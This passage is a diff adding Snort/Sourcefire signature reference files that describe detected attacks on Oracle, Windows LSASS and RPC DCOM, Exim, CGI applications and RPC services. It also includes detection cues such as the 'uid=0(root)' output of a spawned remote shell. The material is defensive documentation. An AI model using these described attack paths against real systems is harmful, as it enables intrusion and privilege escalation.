+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2769.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2769
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_mview_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2510.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2510
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-4.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-4
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2600.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2600
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "add_grouped_column" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/1496.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1496
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1174.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1174
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2015.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2015
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+need for detailed network information. Some versions of RPC have a 
+vulnerability that allows an a remote host to register (and un-register)
+applications from a spoofed source.
+
+--
+Impact:
+Possible denial of service (DoS) against the target host. Potential 
+remote root compromise of the target system.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that could allow 
+an attacker capable of spoofing UDP packets to set and unset calls to 
+arbitrary RPC programs.
+
+A denial of service could be instigated against the target machine that 
+could render network file system services and other such network 
+available services unavailable to network users.
+
+It is also possible for the attacker to gain super user access depending
+on the RPC service he is able to register. This could then lead to a
+compromise of all resources on the network the victim is attached to.
+
+--
+Affected Systems:
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof UDP packets for pmap_set to 
+register an RPC service. The attacker might also spoof UDP packets to 
+un-register needed services via pmap_unset.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+BugTraq:
+http://www.securityfocus.com/bid/1892
+
+--
--- /dev/null
+++ b/doc/signatures/2670.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+2670
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+pgpmail.pl.
+
+-- 
+Impact: 
+Possible unauthorized administrative access to the victim host.
+
+--
+Detailed Information:
+The script pgpmail.pl does not properly sanitize user supplied input.
+This may allow an attacker to supply commands of their choosing to the
+victim host with the privileges of the user running the web server.
+
+--
+Affected Systems:
+	pgpmail prior to and including 3.6
+
+--
+Attack Scenarios: 
+An attacker can supply arbitrary commands to the pgpmail.pl script.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script pgpmail.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3358.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3358
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2593.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2593
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/2487.txt
@@ -0,0 +1,63 @@
+Rule:
+--
+
+Sid:
+2487
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with winzip's processing of certain MIME archive files. 
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running winzip.
+
+--
+Detailed Information:
+Winzip is a program that is used for file compression on Windows hosts.
+A buffer overflow exists when parsing specific header fields for certain 
+MIME file types.  An overly long value passed to specific Content-Type attributes
+may trigger the buffer overflow and allow the execution of arbitrary code
+in the context of the user running winzip.
+
+--
+Affected Systems:
+Winzip 6.x, 7.x, 8.0, 8.1 SR-1, 8.1, Winzip 9.0 beta versions
+
+--
+Attack Scenarios:
+An attacker can entice a user to open a malformed MIME file that will
+invoke winzip to process it, possibly causing a a buffer overflow 
+and the subsequent execution of arbitrary code on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://securityfocus.com/bid/9758
+
+--
--- /dev/null
+++ b/doc/signatures/100000391.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadma.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadma.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/572.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+572
+
+--
+Summary:
+This event is generated when an attempt is made to disable the rpc.ttdbservd service.
+
+--
+Impact:
+Denial of service.  A successful attack may kill the ToolTalk database server.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications to communicate in the Common Desktop Environment (CDE).  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server is enabled by default on hosts with CDE.  Due to an implementation fault in rpc.ttdbserverd, it is possible for a malicious remote client to formulate an RPC message that will cause the server to crash.   
+
+--
+Affected Systems:
+HP HP-UX 10.10, 10.20, 10.30, 11.0
+IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can attempt a denial of service attack by causing a vulnerable ToolTalk database server to crash.   
+
+--
+Ease of Attack:
+Easy.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+
+Bugtraq
+http://www.securityfocus.com/bid/122
+
+Arachnids:
+http://www.whitehats.com/info/IDS241
+
+--
--- /dev/null
+++ b/doc/signatures/688.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2774.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2774
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1862.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1862
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2427.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2427
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3298.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3298
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1969.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1969
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1655.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1655
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/498.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+498
+
+-- 
+
+Summary: 
+This event is generated by the use of a UNIX "id" command. This may be 
+indicative of post-compromise behavior where the attacker is checking 
+for super user privileges gained by a sucessful exploit against a 
+vulnerable system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained super user access to the system.
+
+--
+Detailed Information:
+This event is generated when a UNIX "id" command is used to confirm the
+user name of the currenly logged in user over an unencrypted connection. 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+The string "uid=0(root)" is an output of an "id" command indicating that
+the user has "root" privileges.  Seeing such a response indicates that
+some user, connected over the network to a target server, has root privileges.
+
+--
+
+Attack Scenarios: 
+A buffer overflow exploit against an FTP server results in "/bin/sh"
+being executed. An automated script performing an attack, checks for the
+success of the exploit via an "id" command.
+
+-- 
